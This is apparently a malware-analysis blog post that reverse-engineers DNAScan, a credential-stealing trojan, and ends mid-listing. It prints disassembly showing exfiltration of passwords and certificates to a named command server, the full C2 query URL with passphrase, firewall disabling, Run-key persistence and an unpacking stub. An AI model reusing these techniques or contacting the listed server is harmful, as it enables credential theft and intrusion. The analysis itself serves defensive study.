DNAScan Malicious Network Activity Reverse Engineering

In this blog post we will investigate deeply the effective functionalities of DNAScan,
that can be seen as a set of Threads that accomplish different networking functionalities like:

* Server Functionalities
* Client Functionalities
* Malicious File Exchange
* Generic Backdoor

Let's start from the beginning of network functionalities setup, initially from the main thread is called WSAStartup used to initiate the Winsock DLL, successively is called a classical socket() and immediately after WSAIoctl


0040A0EE PUSH 2600
0040A0F3 PUSH EAX
0040A0F4 PUSH EBX
0040A0F5 PUSH EBX
0040A0F6 PUSH 4004747F
0040A0FB PUSH ESI
0040A0FC CALL DWORD PTR DS:[41526C] ;WSAIoctl

The WSAIoctl function controls the mode of a socket, works like DeviceIoControl so we have a suite of IO Control Codes, in our case the Control Code is 4004747F that corresponds to SIO_GET_INTERFACE_LIST

Returns a list of configured IP interfaces and their parameters as an array of INTERFACE_INFO structures. After setting socket options and binding we have another WSAIoctl this time with code 98000001 in this way the socket normal working parameters are modified, indeed 98000001 corresponds to SIO_RVALL that enables a socket to receive all IP packets on the network, to use this application need to be in RAW mode using IP protocol and bound to a specific local adapter. Finished this the first thread is created

0040A089 PUSH EAX
0040A08A PUSH ESI
0040A08B PUSH EDI
0040A08C PUSH OFFSET srcdll.00409FCD ; Look here to know what thread does
0040A091 PUSH ESI
0040A092 PUSH ESI
0040A093 CALL DWORD PTR DS:[415130]

after opening this thread the first socket is closed. Now the next important function called is SHGetFolderPath witch sets as folders \user\cookies, finally execution jumps to a secondary thread that contains a recvfrom

00409F89 PUSH EDI
00409F8A PUSH EDI
00409F8B PUSH EDI
00409F8C PUSH 4000
00409F91 PUSH ESI
00409F92 PUSH DWORD PTR SS:[EBP+8]
00409F95 CALL DWORD PTR DS:[415268] ;recvfrom

by watching the buffer out (second parameter) we can see what arrives to DNAScan


001644B8 E..a......=
001644D8 .... EFFGEJEMEDFCFJCNDFDGE
001644F8 CDFDIEEDIAA. FHEPFCELEHFCEPFFFAC
00164518 ACACACACACABN.SMB%.............
00164538 ............................
00164558 ......V..
.
...\MAILSLOT\BRO
00164578 WSE...........................

this recvfrom is repeated until certain conditions that depends from watch application receives,
under certain conditions sento from server reacts. After setting this is builded another thread that makes use of a classical server architecture

* Socket
* Listen
* Accept

Next networking operation is the Pipe building

00407DCF PUSH 0
00407DD1 PUSH 0
00407DD3 PUSH 400
00407DD8 PUSH 400
00407DDD PUSH 0FF
00407DE2 PUSH 0
00407DE4 PUSH 3
00407DE6 PUSH OFFSET srcdll.004025B4 ; ASCII "\\.\pipe\ie_down_pipe"
00407DEB CALL ; Jump to kernel32.CreateNamedPipeA
00407DF0 CMP EAX,-1
00407DF3 JNE SHORT 00407DF7
00407DF5 JMP SHORT 00407E58
00407DF7 MOV DWORD PTR SS:[EBP-4],EAX
00407DFA MOV DWORD PTR SS:[EBP-8],0
00407E01 PUSH 0
00407E03 PUSH DWORD PTR SS:[EBP-4]
00407E06 CALL ; Jump to kernel32.ConnectNamedPipe

This creates a named pipe \\.\pipe\ie_down_pipe and successively Enables a named pipe server process to wait for a client process to connect to an instance of a named pipe.

At this point is assembled the following string

00401620 http://%s%s?user_id=%.4u&version_id=%s&passphrase=%s&socks=%lu&v
00401660 ersion=%lu&crc=%.8x.URL: sniffer_ftp_%s..ftp_server=%s&ftp_login
004016A0 =%s&ftp_pass=%s&version=%lu.URL: sniffer_pop3_%s..pop3_server=%s
004016E0 &pop3_login=%s&ftp_pass=%s.URL: sniffer_imap_%s..imap_server=%s
00401720 &imap_login=%s&imap_pass=%s.URL: sniffer_icq_%s..icq_user=%s&icq
00401760 _pass=%s.SharedAccess.wscsvc.=.GET_COOK.VER.EXE.DL.DL_EXE.DL_EXE
004017A0 _ST.REBOOT.\%lu.exe./upd %lu

as you can see there are a couple of interesting strings like

• ftp_pass=%s
• imap_pass=%s
• sniffer_pop3_%s
• sniffer_icq_%s

0040587D PUSH EAX
0040587E PUSH DWORD PTR SS:[EBP-4] ;take a look here
00405881 PUSH 0
00405883 CALL ; Jump to wininet.FindFirstUrlCacheEntryA

this api enumerates the Internet cache, to see what comes out just watch the second parameter

0040588F MOV EAX,DWORD PTR SS:[EBP-4]
00405892 MOV ECX,DWORD PTR DS:[EAX+4]
00405895 PUSH ECX
00405896 PUSH DWORD PTR SS:[EBP+8]
00405899 PUSH ECX
0040589A CALL ; Jump to shlwapi.StrStrIA
0040589F POP ECX
004058A0 OR EAX,EAX
004058A2 JE SHORT 004058AA
004058A4 PUSH ECX
004058A5 CALL ; Jump to wininet.DeleteUrlCacheEntry
004058AA MOV DWORD PTR SS:[EBP-8],1000
004058B1 LEA EAX,[EBP-8]
004058B4 PUSH EAX
004058B5 PUSH DWORD PTR SS:[EBP-4]
004058B8 PUSH DWORD PTR SS:[EBP-0C]
004058BB CALL ; Jump to wininet.FindNextUrlCacheEntryA
004058C0 JMP SHORT 0040588B
004058C2 PUSH DWORD PTR SS:[EBP-0C]
004058C5 CALL ; Jump to wininet.FindCloseUrlCache

this piece of code scans Url Cache to find the previously seen IP address and if discovered, removes it with DeleteUrlCacheEntry.

00405937 PUSH EAX
00405938 PUSH OFFSET srcdll.0040A872 ; ASCII "http://91.213.94.130/cgi-bin/options.cgi?user_id=373125111&version_id=17
&passphrase=fkjvhsdvlksdhvlsd&socks=9180&version=132&crc=00000000"
0040593D PUSH 0
0040593F CALL ; Jump to urlmon.URLOpenBlockingStreamA

Creates a blocking type stream object from a URL and downloads the data from the Internet. When the data is downloaded the client application or control can read it by using the IStream::Read method.

By analysing the URL we can extract the following informations:

• user_id=373125111
• version_id=17
• passphrase=fkjvhsdvlksdhvlsd
• socks=9180
• version=132
• crc=00000000

When you step URLOpenBlockingStreamA be aware that this function presents thread and fiber functionalities to speed up and make an easier analysis approach just detach for one step the New Thread Break Event. If incidentally you have this Event enabled, surf between threads with Execute till Return and Run Actual Thread.

_Next Thread_

Here the malicious application scans into C:\Documents and Settings\evilcry\Cookies\ cookie by cookie

00408305 PUSH DWORD PTR SS:[EBP+8] ; ASCII "C:\Documents and Settings\evilcry\Cookies\"
00408308 PUSH EDI
00408309 CALL ; Jump to kernel32.lstrcpyA
0040830E MOV EDX,DWORD PTR SS:[EBP-8]
00408311 LEA EDX,[EDX+2C]
00408314 PUSH EDX
00408315 PUSH EDI
00408316 CALL ; Jump to kernel32.lstrcatA
0040831B PUSH EDI
0040831C CALL ; Jump to kernel32.DeleteFileA
00408321 PUSH DWORD PTR SS:[EBP-8]
00408324 PUSH DWORD PTR SS:[EBP-4]
00408327 CALL ; Jump to kernel32.FindNextFileA
0040832C TEST EAX,EAX
0040832E JNE SHORT 004082E5
00408330 PUSH DWORD PTR SS:[EBP-4]
00408333 CALL ; Jump to kernel32.FindClose

Successively by using ad usual CreateToolhelp32Snapshot and Process32First/Process32Next and WriteProcessMemory DNAScan injects some pieces of code in various system processes. This is essentially not useful for our analysis scopes actually.


0040795B 55 PUSH EBP
0040795C 8BEC MOV EBP,ESP
0040795E 83C4 F8 ADD ESP,-8
00407961 53 PUSH EBX
00407962 E8 57F6FFFF CALL 00406FBE

Inside the call

00406FC9 PUSH OFFSET srcdll.0040B87E
00406FCE PUSH 1
00406FD0 PUSH 0
00406FD2 CALL ; Jump to OLE32.CreateStreamOnHGlobal

The CreateStreamOnHGlobalfunction creates a stream object that uses an HGLOBAL memory handle to store the stream contents. This object is the OLE-provided implementation of the IStream interface.

..
00406FE1 PUSH OFFSET srcdll.0040B87A
00406FE6 PUSH srcdll.00401B50 ; ASCII "pstorec.dll"
00406FEB CALL 00406F71 ; Loads from pstorec.dll PStoreCreateInstance
00406FF0 TEST EAX,EAX
00406FF2 JE SHORT 00407033
00406FF4 PUSH OFFSET srcdll.0040B882
00406FF9 PUSH srcdll.00401B73 ; ASCII "crypt32.dll"
CALL 00406F71 ; Loads from crypt32.dll CryptUnprotectData

00407009 PUSH EAX
0040700A PUSH EAX
0040700B PUSH EAX
0040700C LEA EDX,[40B876]
00407012 PUSH EDX
00407013 CALL DWORD PTR DS:[40B87A] ;PStoreCreateInstance

Protected Storage (Pstore) is available for use in Windows Server 2003, Windows XP, and Windows 2000. It is only available for read-only operations in Windows Server 2008 and Windows Vista. Pstore uses an older implementation of data protection.

outside the call

00407972 E8 AB290000 CALL ; Jump to OLE32.GetHGlobalFromStream

The GetHGlobalFromStream function retrieves the global memory handle to a stream that was created through a call to the CreateStreamOnHGlobal function. The second parameter is an out global memory handle


00407977 53 PUSH EBX
00407978 E8 68B4FFFF CALL 00402DE5
0040797D 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX
00407980 FF75 FC PUSH DWORD PTR SS:[EBP-4]
00407983 E8 662A0000 CALL ; Jump to kernel32.GlobalLock

Now if we focus inside the address pointed by EAX we can see a truly interesting thing

0016E5D8 Forms: ....URL Form / Auto: http://xxxxxxxxxxxxx.com/wp
0016E618 -login.php..User/Pass: xxxxxx:....URL Form / Auto: http://
0016E658 www.xxxxxxxx/forums/..User/Pass: Evilcry:xxxxxxxxxx
0016E698 (Modified: 17/10/2009 15:02)

as you can see the malicious application extracs URLs + User and Passwords. Now the malicious application surely will try to send the stolen credentials to a malicious server.


00407988 0BC0 OR EAX,EAX
0040798A 74 16 JE SHORT 004079A2
0040798C FF75 F8 PUSH DWORD PTR SS:[EBP-8]
0040798F 50 PUSH EAX
00407990 68 6A104000 PUSH srcdll.0040106A ; ASCII "/cgi-bin/pstore.cgi"
00407995 E8 CDEBFFFF CALL 00406567
0040799A FF75 FC PUSH DWORD PTR SS:[EBP-4]
0040799D E8 522A0000 CALL ; Jump to kernel32.GlobalUnlock

Inside -> CALL 00406567

00406570 PUSH EBX
00406571 PUSH 0
00406573 PUSH 0
00406575 PUSH 0
00406577 PUSH 0
00406579 PUSH OFFSET srcdll.004025AC ; ASCII "IE"
0040657E CALL ; Jump to wininet.InternetOpenA

Initializes an application's use of the WinINet functions, the return value must be != NULL

00406583 OR EAX,EAX
00406585 JE 0040672C
0040658B MOV DWORD PTR SS:[EBP-4],EAX
0040658E PUSH 0
00406590 PUSH 0
00406592 PUSH 3
00406594 PUSH 0
00406596 PUSH 0
00406598 PUSH 0
0040659A PUSH DWORD PTR DS:[402020] ; ASCII "91.213.94.130"
004065A0 PUSH DWORD PTR SS:[EBP-4]
004065A3 CALL ; Jump to wininet.InternetConnectA

Opens an File Transfer Protocol (FTP) or HTTP session for a given site.

004065B3 PUSH 0
004065B5 PUSH 4080000
004065BA PUSH 0
004065BC PUSH 0
004065BE PUSH 0
004065C0 PUSH DWORD PTR SS:[EBP+8]
004065C3 PUSH OFFSET srcdll.004025AF ; ASCII "POST"
004065C8 PUSH DWORD PTR SS:[EBP-8]
004065CB CALL ; Jump to wininet.HttpOpenRequestA

Send a POST request to /cgi-bin/pstore.cgi

00406618 PUSH 20000000
0040661D PUSH EAX
0040661E LEA EAX,[EBP-14C]
00406624 PUSH EAX
00406625 PUSH DWORD PTR SS:[EBP-0C]
00406628 CALL ; Jump to wininet.HttpAddRequestHeadersA

Adds one or more HTTP request headers to the HTTP request handle, the second parameter is a Pointer
to a string variable containing the headers to append to the request, so let's check it.

Content-Type: multipart/form-data; boundary=--------------------------2ffe24e2ffe24e2ffe24e


Finally with wspintfA is builded the following string


0012FCB4 ..----------------------------2ffe24e2ffe24e2ffe24e--......#.
0012FCF4 .l. |...........|.|.l|...#.`..@Z|...a..P
0012FD34 Content-Disposition: form-data; name="upload_file"; filename="37
0012FD74 3125111.17"

where we can see the kind of request name="upload_file" and the filename 37
0012FD74 3125111.17

finally is called

004066F6 PUSH EBX
004066F7 PUSH DWORD PTR SS:[EBP-154]
004066FD PUSH 0
004066FF PUSH 0
00406701 PUSH DWORD PTR SS:[EBP-0C]
00406704 CALL ; Jump to wininet.HttpSendRequestA

Sends the specified request to the HTTP server, the second parameter of this function is the header itself.

At this point HTTP transactions are finished all handle closed and begins a new thread, that deals with
CryptoApi.

00406737 PUSH EDI
00406738 PUSH srcdll.00401594 ; ASCII "MY"
0040673D PUSH 0
0040673F CALL ; Jump to CRYPT32.CertOpenSystemStoreA

The CertOpenSystemStore function is a simplified function that opens the most common system certificate store, MY means that a certificate store that holds certificates with associated private keys.

00406756 PUSH 4
00406758 PUSH 0
0040675A PUSH srcdll.00401597 ; UNICODE "Password"
0040675F LEA EAX,[EBP-8]
00406762 PUSH EAX
00406763 PUSH DWORD PTR SS:[EBP-0C]
00406766 CALL ; Jump to CRYPT32.PFXExportCertStoreEx

The PFXExportCertStoreEx function exports the certificates and, if available, their associated private keys from
the referenced certificate store.

In this way DNAScan obtains sensitive informations, like the Private Keys.

The second parameter is a pointer to CRYPT_DATA_BLOB structure, that contains the PFX packet with the exported certificates and key. The Third parameter is string password used to encrypt and verify the PFX packet.

0040677E PUSH 4
00406780 PUSH 0
00406782 PUSH srcdll.00401597 ; UNICODE "Password"
00406787 LEA EAX,[EBP-8]
0040678A PUSH EAX
0040678B PUSH DWORD PTR SS:[EBP-0C]
0040678E CALL ; Jump to CRYPT32.PFXExportCertStoreEx

The PFXExportCertStoreEx function exports the certificates and, if available, their associated private
keys from the referenced certificate store.

Now certificates are correctly stolen, and need to be sent to the malicious server. Indeed after some line of code we can see the following

00406797 PUSH DWORD PTR SS:[EBP-8]
0040679A PUSH EDI
0040679B PUSH srcdll.00401058 ; ASCII "/cgi-bin/cert.cgi"
004067A0 CALL 00406567

Stolen certificates are sent to /cgi-bin/cert.cgi as previously seen for User/Password Credentials.

Essentially application upload each sensitive information to a precise location, here a quick list

• /cgi-bin/options.cgi
• /cgi-bin/forms.cgi
• /cgi-bin/cert.cgi
• /cgi-bin/pstore.cgi
• /cgi-bin/ss.cgi
• /cgi-bin/keylog.cgi
• /cgi-bin/file.cgi
• /cgi-bin/mail.cgi
• /cgi-bin/cmd.cgi
• /cgi-bin/forms.cgi

from the name of these cgi we can suddenly understand what is stolen

• Files
• Mails
• Passwords
• Certificates
• Misc.

If we attemp a direct browser access to the malicious server, we will obtain a classical 404 Error, but
let's try to send direct queries like

http://91.213.94.130/cgi-bin/options.cgi?user_id=373125111&version_id=17
&passphrase=fkjvhsdvlksdhvlsd&socks=9180&version=132&crc=00000000

as you can see options.cgi is reatched and correctly downloaded we can prosecute with a more deep inspection by using Nmap.

The scanning options used are tipical of an Intense Scan

Starting Nmap 4.76 ( http://nmap.org ) at 2009-11-28 16:39 ora solare Europa occidentale
Initiating Ping Scan at 16:39
Scanning 91.213.94.130 [5 ports]
Completed Ping Scan at 16:39, 0.53s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:39
Completed Parallel DNS resolution of 1 host. at 16:39, 0.15s elapsed
Initiating SYN Stealth Scan at 16:39
Scanning 91.213.94.130 [1000 ports]
Increasing send delay for 91.213.94.130 from 0 to 5 due to max_successful_tryno increase to 5
Increasing send delay for 91.213.94.130 from 5 to 10 due to max_successful_tryno increase to 6
Warning: Giving up on port early because retransmission cap hit.
Discovered open port 22/tcp on 91.213.94.130
Discovered open port 80/tcp on 91.213.94.130
SYN Stealth Scan Timing: About 12.40% done; ETC: 16:43 (0:03:32 remaining)
Discovered open port 5222/tcp on 91.213.94.130
Discovered open port 111/tcp on 91.213.94.130

But we can obtain more informations with a Slow Intense Scan like

nmap -PE -PA21,23,80,3389 -A -v -T4 91.213.94.130

here what emerges
Open Ports:

• 22
• 25 (filtered)
• 80 (lighttpd 1.4.19)
• 111 (rpcbind)
• 5222 (Jabber instant messaging server)
• 5269 (Jabber instant messaging server)
• 389 (ms-term-serv)

Operating System: OpenWrt 7.09 (Linux 2.6.22)

Regards,
Giuseppe 'Evilcry' Bonfa'

DNAScan Malware Analysis from Browser to the Code #2

00370DE5 MOV EDX,DWORD PTR SS:[EBP+10]
00370DE8 MOV EAX,DWORD PTR DS:[EDX+20]
00370DEB CALL EAX ;LoadLibrary("ntdll.dll")
00370DED MOV DWORD PTR SS:[EBP-0F8],EAX
00370DF3 MOV ECX,DWORD PTR SS:[EBP-28]

after loading and building a complete IT, execution comes back to the main code
via this gate

00372086 XOR EAX,EAX
00372088 JMP DWORD PTR SS:[EBP-1C] ; jump 00409647
0037208B MOV ESP,EBP


the interesting part begins here..

0040964D PUSH 0
0040964F PUSH 0
00409651 PUSH OFFSET feedback_-_DNAScan.004027A8 ; ASCII "EnableLUA"
00409656 PUSH OFFSET feedback_-_DNAScan.0040276E ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
0040965B PUSH 80000002
00409660 CALL 0040623E ; Registry Operations

This call attempts to open with RegOpenKeyA the specified RegKey and successively
Queries it and after taking the needed values execution jumps here

004096DC MOV DWORD PTR DS:[402020],feedback_-_DNA ; ASCII "91.213.94.130"
004096E6 PUSH OFFSET feedback_-_DNAScan.0040938F

as you can see we have a static IP address that surely will become a trusted IP into
system security policies ;)

004093F1 CALL ; Jump to kernel32.GetTickCount
004093F6 XOR EDX,EDX
004093F8 MOV ECX,7530
004093FD DIV ECX
004093FF ADD EDX,400
00409405 MOV DWORD PTR DS:[401568],EDX ;Store random number
0040940B PUSH feedback_-_DNAScan.00401769 ; ASCII "SharedAccess"

GetTickCount is used as a source for random number generation, next is called
OpenSCManagerA for shared address

00407EB2 PUSH EDX
00407EB3 PUSH 1
00407EB5 PUSH EAX
00407EB6 CALL ; Jump to ADVAPI32.ControlService

ControlService sends a control code to a service,

BOOL WINAPI ControlService(
__in   SC_HANDLE hService,
__in   DWORD dwControl,
__out  LPSERVICE_STATUS lpServiceStatus
);

In this way DNAScan disables Windows Security, precisely disables Windows Firewall.

00409415 PUSH feedback_-_DNAScan.00401776 ; ASCII "wscsvc"
0040941A CALL 00407E5C

wscsvc belongs to Windows Security Center Service, that will be disabled as previously seen.

0040629C CALL ; Jump to kernel32.GetModuleFileNameA
004062A1 PUSH 104
004062A6 LEA EAX,[EBP-20E]
004062AC PUSH EAX
004062AD CALL ; Jump to kernel32.GetWindowsDirectoryA
004062B2 PUSH feedback_-_DNAScan.0040113C ; ASCII "\srcdll.exe"
004062B7 LEA EAX,[EBP-20E]
004062BD PUSH EAX
004062BE CALL ; Jump to kernel32.lstrcatA
004062C3 LEA EAX,[EBP-4]
004062C6 PUSH EAX
004062C7 PUSH feedback_-_DNAScan.004015BA ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
004062CC PUSH 80000001
004062D1 CALL ; Jump to ADVAPI32.RegCreateKeyA
004062D6 LEA EAX,[EBP-20E]
004062DC PUSH EAX
004062DD CALL ; Jump to kernel32.lstrlen
004062E2 INC EAX
004062E3 PUSH EAX
004062E4 LEA EAX,[EBP-20E]
004062EA PUSH EAX
004062EB PUSH 1
004062ED PUSH 0
004062EF PUSH feedback_-_DNAScan.00401136 ; ASCII "ttool"
004062F4 PUSH DWORD PTR SS:[EBP-4]
004062F7 CALL ; Jump to ADVAPI32.RegSetValueExA
004062FC PUSH DWORD PTR SS:[EBP-4]
004062FF CALL ; Jump to ADVAPI32.RegCloseKey

This piece of code places in /windows directory a malicious file called srcdll.exe and successively sets srcdll.exe as a startup application, so malware will survive to OS Reboot.

00406334 PUSH 0
00406336 PUSH 0
00406338 PUSH OFFSET feedback_-_DNAScan.00402570 ; ASCII "RF"
0040633D PUSH OFFSET feedback_-_DNAScan.004027B2 ; ASCII "Software\Microsoft\InetData"
00406342 PUSH 80000001
00406347 CALL 0040623E

this sets a new registry entry Software\Microsoft\InetData after setting this RegEntry, successively is called GetCommandLine and parsed, if no argumenti is specified execution
jumps to ShellExecuteA, if we change this execution jumps to the most interesting part.

The following code is MultiThreaded so be sure to have enabled correct Events, like Break on New Thread.

DNAScan opens sockets and in various threads perform queries to the IP previously added to the Security Policies..here an interesting piece of code that assembles an url with password

004088AD PUSH 0
004088AF PUSH 84
004088B4 PUSH DWORD PTR DS:[401568]
004088BA PUSH srcdll.00401124 ; ASCII "fkjvhsdvlksdhvlsd"
004088BF PUSH OFFSET srcdll.0040A7D6 ; ASCII "17"
004088C4 PUSH EAX
004088C5 PUSH srcdll.004010EA ; ASCII "/cgi-bin/cmd.cgi"
004088CA PUSH DWORD PTR DS:[402020] ; ASCII "91.213.94.130"
004088D0 PUSH srcdll.00401620 ; ASCII "http://%s%s?user_id=%.4u&version_id=%s&passphrase=%s&socks=%lu&version=%lu&crc=%.8x"
004088D5 PUSH OFFSET srcdll.0040B072
004088DA CALL ; Jump to USER32.wsprintfA

the final string is:


http://91.213.94.130/cgi-bin/cmd.cgi?user_id=373125111&version_i
d=17&passphrase=fkjvhsdvlksdhvlsd&socks=7633&version=132&crc=000
00000

where we can extract password and CRC
passphrase=fkjvhsdvlksdhvlsd
crc=00000000

we have also a Pipe creation

00407DCF PUSH 0
00407DD1 PUSH 0
00407DD3 PUSH 400
00407DD8 PUSH 400
00407DDD PUSH 0FF
00407DE2 PUSH 0
00407DE4 PUSH 3
00407DE6 PUSH OFFSET srcdll.004025B4 ; ASCII "\\.\pipe\ie_down_pipe"
00407DEB CALL ; Jump to kernel32.CreateNamedPipeA

DNAScan Malware Analysis from Browser to the Code #1

This time we are going to see how DNAScan works.
Essentially this malware presents three major functionalities:

• Downloads other files from Internet.
• Creates a startup registry entry.
• Rootkit functionality, hides its presence in infected machine in order to perform malicious actions without user's knowledge.

Basilar informations about the malicious file:

MD5: 19D937A7A0532926FE1A8FADD7AA96FF
CompanyName: tzuk
FileDescription: Sandboxie Start
LegalCopyright: Copyright © 2004-2008 by Ronen Tzur
OriginalFilename: Start.exe

DNAScan is hosted into a fake php page, here the route from browser to the malicious code

Trace

TTL  LFT trace to 195.93.208.6:80/tcp
1   [AS15968] [RIPE-C3/NETPILOTGMBH-DE] gwy.netpilot.net (62.67.240.1) 0.5/0.4ms
2   [AS15968] [RIPE-C3/NETPILOTGMBH-DE] gwy34.netpilot.net (62.67.240.17) 0.7/0.9ms
3   [AS15968] [RIPE-C3/NETPILOTGMBH-DE] l3gate1.netpilot.net (62.67.194.62) 90.0/2.3
ms
4   [AS3356] [RIPE-NCC-212/UK-LVLT-990218] gi-6-3.car1.Munich1.Level3.net (212.162.1.
65) 330.4/20.8ms
5   [AS3356] [LVLT-ORG-4-8] ae-4-4.ebr1.Frankfurt1.Level3.net (4.69.134.2) 198.0/8.
1ms
6   [AS3356] [LVLT-ORG-4-8] ae-91-91.csw4.Frankfurt1.Level3.net (4.69.140.14) 51.5/18
.0ms
7   [AS3356] [LVLT-ORG-4-8] ae-41-99.car1.Frankfurt1.Level3.net (4.68.23.195) 95.4/8.
1ms
8   [AS3356] [RIPE-C3/FRANKFURT-SERIAL2] 62.67.38.50 533.9/12.9ms
9   [AS8359] [RIPE-CBLK3/MTU-BTN] bor-cr01-po3.spb.stream-internet.net (195.34.53.101
) 396.0/55.1ms
10   [AS8359] [RIPE-CBLK3/MTU-BTN] m9-crs-1-be1.msk.stream-internet.net (195.34.53.
125) 516.4/56.3ms
11   [AS8359] [RIPE-CBLK3/TRADITION-NET] m9-cr02-po6.msk.stream-internet.net (195.
34.59.242) 380.7/83.0ms
12   * [AS8359] [RIPE-CBLK3/MTU-SL5] GarantPark-m9.msk.stream-internet.net (195.34.
36.154) 48.0ms
13   [AS5537] [89-RIPE/RU-GPT-20060426] 89.111.160.209 348.0/98.8ms
14   * [AS5537] [89-RIPE/RU-GPT-20060426] 89.111.143.18 48.4ms
15   * [AS25189] [RIPE-213/NLINE-USERS-NET] phone.nline.ru (213.251.192.26) 48.3ms
**   [firewall] the next gateway may statefully inspect packets
16   [AS31366] [RIPE-CBLK3/smallshop] mail.smallshopkz.org (195.78.122.2) 477.6/110
.0ms
17   * [AS44349] [RIPE-CBLK3/MEDLAIF-NET] [target] 195.93.208.6:80 110.8/*/*/*ms

LFT's trace took 10.63 seconds.  Resolution required 76.96 seconds.

Session Transcription

---request begin---
GET /feedback.php?page=3 HTTP/1.0
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; en-US)
Accept: */*
--request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.0 200 OK
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny3
Content-Type: application/octet-stream
Content-Length: 69120
Date: Fri, 13 Nov 2009 14:02:42 GMT
Server: lighttpd/1.4.19

---response end---

 HTTP/1.0 200 OK
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny3
Content-Type: application/octet-stream
Content-Length: 69120
Date: Fri, 13 Nov 2009 14:02:42 GMT
 Server: lighttpd/1.4.19
Length: ignored [application/octet-stream]

0K .......... .......... .......... .......... ..........  110.58 KB/s
50K .......... .......                                      164.61 KB/s

Closed fd 19
13:43:28 (120.86 KB/s) - `/tmp/BARM7NqKY' saved [69120]

Host: 100creativeideas.cn

Be aware that with certain engines download does not work, precisely session transaction
is dropped.

Now let's check the downloaded malicious executable


As you can see the structure of this PE is a bit suspect because appears to be limited to four functions and does not presents a true Execution Flow from a Static point of view, this mean
that application is packed/encrypted. Let's reverse if from EntryPoint to decode the application.

004012E4 start:
004012E4 push ebp
004012E5 push ebp
004012E6 pushf
004012E7 xor ebp, ebp
004012E9 push eax
004012EA mov ebp, eax
004012EC add ebp, 38884h
..
004013D0 call ds:CLSIDFromOle1Class

EAX contains 80070057

00401617 push edx
00401618 call loc_401000 ;Decodes a piece of code
0040161D add esp, 18h
..
0040164E push edx
0040164F call loc_401000 ;Decodes a piece of code
00401654 add esp, 18h
..
0040167C push edx
0040167D call loc_401000 ;Decodes a piece of code
00401682 add esp, 18h

after approximately 6-7 times that Decoding Function is Called, we land here

00401768 push 40h ;PAGE_EXECUTE_READWRITE
0040176A push 3000h ;3000h data block size
0040176F mov edx, [ebp-28h]
00401772 add edx, [ebp-254h]
00401778 add edx, [ebp-24h]
0040177B push edx
0040177C push 0
0040177E call ds:VirtualAlloc
00401784 mov [ebp-238h], eax ;Address of block data stored

As you should know this allocates a block of data that will be used as parallel code location
indeed page has EXECUTE rights.

004018A1 mov eax, [ebp-238h] ;Allocation Address in EAX (Destination)
004018A7 add eax, [ebp-14h]
004018AA mov ecx, [ebp-8] ;Source Address
004018AD mov dl, [ecx]
004018AF mov [eax], dl
004018B1 ov eax, [ebp-8]
..

With some iteration Destination is filled with the running code, and finally execution jumps
into this code

00401962 push edx
00401963 call dword ptr [ebp-264h] ;call Alloc_Address

And here we are In..

00370F50 PUSH EBP
00370F51 MOV EBP,ESP
00370F53 SUB ESP,1244
00370F59 CALL 00370F00
00370F5E MOV DWORD PTR SS:[EBP-11F0],EAX ; kernel32's address in stack
00370F64 CALL 00370F30
00370F69 MOV DWORD PTR SS:[EBP-1E8],EAX
00370F6F LEA EAX,[EBP-6C]

Inside CALL 00370F00

00370F04 MOV EAX,DWORD PTR FS:[18]
00370F0A MOV DWORD PTR SS:[EBP-4],EAX
00370F0D MOV EAX,DWORD PTR SS:[EBP-4]
00370F10 MOV ECX,DWORD PTR DS:[EAX+30]
00370F13 MOV EDX,DWORD PTR DS:[ECX+0C]
00370F16 MOV EAX,DWORD PTR DS:[EDX+1C]
00370F19 MOV ECX,DWORD PTR DS:[EAX]
00370F1B MOV EAX,DWORD PTR DS:[ECX+8] ; ASCII " %"
00370F1E MOV ESP,EBP
00370F20 POP EBP
00370F21 RETN

FS:[18] represents TIB (Thread Information Block), this piece of code, locates the
BaseAddress of kernel32.dll. Finally CALL 00370F30 loads by using TIB, ntdll's baseaddress
and store it into stack.

00370F78 MOV BYTE PTR SS:[EBP-1C0],4C
00370F7F MOV BYTE PTR SS:[EBP-1BF],6F
00370F86 MOV BYTE PTR SS:[EBP-1BE],63
..

Byte per byte build sone function name: LocalFree, VirtualFree, VirtualProtect, UnmapViewOfFile, GetModuleHandle, LoadResource, LockResource, FindResourceA, GetProcessHeap, RtlAllocateHeap.

The next step is to build an array of the function strings just builded.

00370149 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-0C]
0037014C 83C2 01 ADD EDX,1
0037014F 8955 F4 MOV DWORD PTR SS:[EBP-0C],EDX
00370152 8B45 F0 MOV EAX,DWORD PTR SS:[EBP-10]
00370155 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-0C]
00370158 3B48 18 CMP ECX,DWORD PTR DS:[EAX+18]
0037015B 7D 5A JGE SHORT 003701B7
0037015D 8B55 F0 MOV EDX,DWORD PTR SS:[EBP-10]
00370160 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00370163 0342 20 ADD EAX,DWORD PTR DS:[EDX+20]
00370166 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-0C]
00370169 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]
0037016C 031488 ADD EDX,DWORD PTR DS:[ECX*4+EAX]
0037016F 8955 EC MOV DWORD PTR SS:[EBP-14],EDX
00370172 8B45 F0 MOV EAX,DWORD PTR SS:[EBP-10]
00370175 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
00370178 0348 24 ADD ECX,DWORD PTR DS:[EAX+24]
0037017B 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-0C]
0037017E 66:8B0451 MOV AX,WORD PTR DS:[EDX*2+ECX]
00370182 66:8945 FC MOV WORD PTR SS:[EBP-4],AX
00370186 8B4D F0 MOV ECX,DWORD PTR SS:[EBP-10]
00370189 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]
0037018C 0351 1C ADD EDX,DWORD PTR DS:[ECX+1C]
0037018F 0FB745 FC MOVZX EAX,WORD PTR SS:[EBP-4]
00370193 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
00370196 030C82 ADD ECX,DWORD PTR DS:[EAX*4+EDX]
00370199 894D F8 MOV DWORD PTR SS:[EBP-8],ECX
0037019C 8B55 EC MOV EDX,DWORD PTR SS:[EBP-14]
0037019F 52 PUSH EDX
003701A0 8B45 0C MOV EAX,DWORD PTR SS:[EBP+0C]
003701A3 50 PUSH EAX
